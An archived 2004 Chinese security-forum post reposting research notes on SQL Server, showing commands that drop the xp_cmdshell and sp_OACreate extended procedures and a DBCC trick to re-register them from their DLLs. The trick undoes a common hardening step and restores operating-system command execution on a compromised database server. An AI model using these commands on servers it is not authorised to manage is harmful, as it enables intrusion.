邪恶八进制信息安全团队技术讨论组's Archiver

exploit 2004-12-15 03:03

[转载]我的研究笔记节选

来源:[url]http://www.haiyang.net/safety/book/show.asp?id=1174[/url]

作者:xiaolu

Dbcc的一个用法
扩展储存过程被删除以后可以有很简单的办法恢复:
比如:
删除
DROP PROCEDURE sp_addextendedproc
DROP PROCEDURE sp_OACreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
:)
更多dbcc命令发掘中。。。

页: [1]
© 1999-2008 EvilOctal Security Team